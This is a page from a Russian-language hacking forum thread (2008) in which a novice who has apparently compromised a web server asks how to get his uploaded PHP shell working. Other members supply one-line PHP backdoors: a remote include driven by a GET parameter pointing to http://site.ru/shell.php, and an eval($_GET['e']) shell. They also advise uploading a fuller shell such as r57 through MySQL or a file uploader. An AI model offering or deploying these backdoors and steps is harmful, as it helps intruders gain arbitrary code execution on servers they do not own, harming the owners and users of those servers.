HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу проблема с шеллом !
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 07.05.2008, 18:41
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
Провел на форуме:
53043

Репутация: 0
По умолчанию
ок но как обеснить ето : при выполнение пустои команды вот рез:
Цитата:
Warning: system() [function.system]: Cannot execute a blank command in /usr/local/apache2/htdocs/cache/version.php on line 1
есль можно по подробнее о том как залить его в /tmp а потом исполизовать !?
 

  #12  
Старый 07.05.2008, 18:58
Ali_MiX
Постоянный
Регистрация: 08.10.2006
Сообщений: 445
Провел на форуме:
1028732

Репутация: 80
Отправить сообщение для Ali_MiX с помощью ICQ Отправить сообщение для Ali_MiX с помощью Yahoo
По умолчанию
Цитата:
Сообщение от zythar  
у тя скобки не хватает.
Код:
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>


это если шелл на серваке который ты взломал уже.
ну так ёмаё замени shell на http://site.ru/shell.php и всё
 

  #13  
Старый 07.05.2008, 19:00
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
Провел на форуме:
53043

Репутация: 0
По умолчанию
я английский знаю но при выполнение команды ls ничего не показивает !!
как можно стартануть из /tmp шелл ???
 

  #14  
Старый 07.05.2008, 19:03
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
Провел на форуме:
53043

Репутация: 0
По умолчанию
Ali_MiX !!! да я всё понял так и зделол и вот каким был результат !!
Цитата:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in /usr/local/apache2/htdocs/cache/process.php on line 1
 

  #15  
Старый 07.05.2008, 19:25
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию
Цитата:
Сообщение от _Pantera_  
Ты уверен что он залился???? куда заливал - в /tmp или ты узнал путь от корня и нашел папку с правами на запись? Я склоняюсь к ответу что он просто не залился......
разумеется он залился смотри предыдущий пост
раз урл-инклуд disabled я бы
1)попытался залить шелл через приложения на сервере
2)попробывал бы не через system()

:add сорри забыл страницу обновить, но оба варианта актуальны)
 

  #16  
Старый 07.05.2008, 19:30
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
Провел на форуме:
53043

Репутация: 0
По умолчанию
Цитата:
Сообщение от l1ght  
разумеется он залился смотри предыдущий пост
раз урл-инклуд disabled я бы
1)попытался залить шелл через приложения на сервере
2)попробывал бы не через system()

:add сорри забыл страницу обновить, но оба варианта актуальны)
пожалуста по подробнее или силку где почитать можно !
 

  #17  
Старый 07.05.2008, 21:27
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию
да просто там запрещен инклуд файлов что то такое функция какая то отключена почитай на форуме много таких тем было
 

  #18  
Старый 07.05.2008, 22:03
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Цитата:
Сообщение от stigmatus  
подскажи как ??? проверить Сейф мод ??
PHP код:
<?php phpinfo(); ?>
получишь phpinfo() а внём уже найдешь информацию про сейф мод.

или так:

PHP код:
<?php eval($_GET['e']); ?>
http://site/shell.php?e=phpinfo();

Так сможешь выполнять php код.

====================================

Цитата:
Сообщение от Ali_MiX  
Цитата:
Сообщение от zythar  
у тя скобки не хватает.
Код:
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
это если шелл на серваке который ты взломал уже.
ну так ёмаё замени shell на http://site.ru/shell.php и всё
Не совсем понял что ты хотел сказать...
Но инклудить вот так: include('http://site/shell.php'); нельзя, т.к. ЭТО во первых будет инклудом удалённого файла, а он у него запрещен (это видно из ошибки), а во вторых проинклудиться в таком случае не сам php код, а результат работы скрипта, а это разные вещи.

====================================

Цитата:
Сообщение от heks  
да просто там запрещен инклуд файлов что то такое функция какая то отключена почитай на форуме много таких тем было
Не 'что то такое', а там запрещен инклуд удалённых файлов (т.е. размещенных на другом сайте).

====================================

to TC, если у тебя так плохо с пхп, то тебе будет проще залить через мускул (ты вроде написал что через него заливал) шелл побольше, что нидь с интерфейсом, или к примеру аплодилку файлов (код у неё не большой) и уже так перезалить что нидь типа r57.

P.S. для вопросов есть, вообще то, специальная, прикреплённая тема.
P.P.S. за советы типа Учи английский буду ставить минусы.
Последний раз редактировалось Grey; 07.05.2008 в 22:08..
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ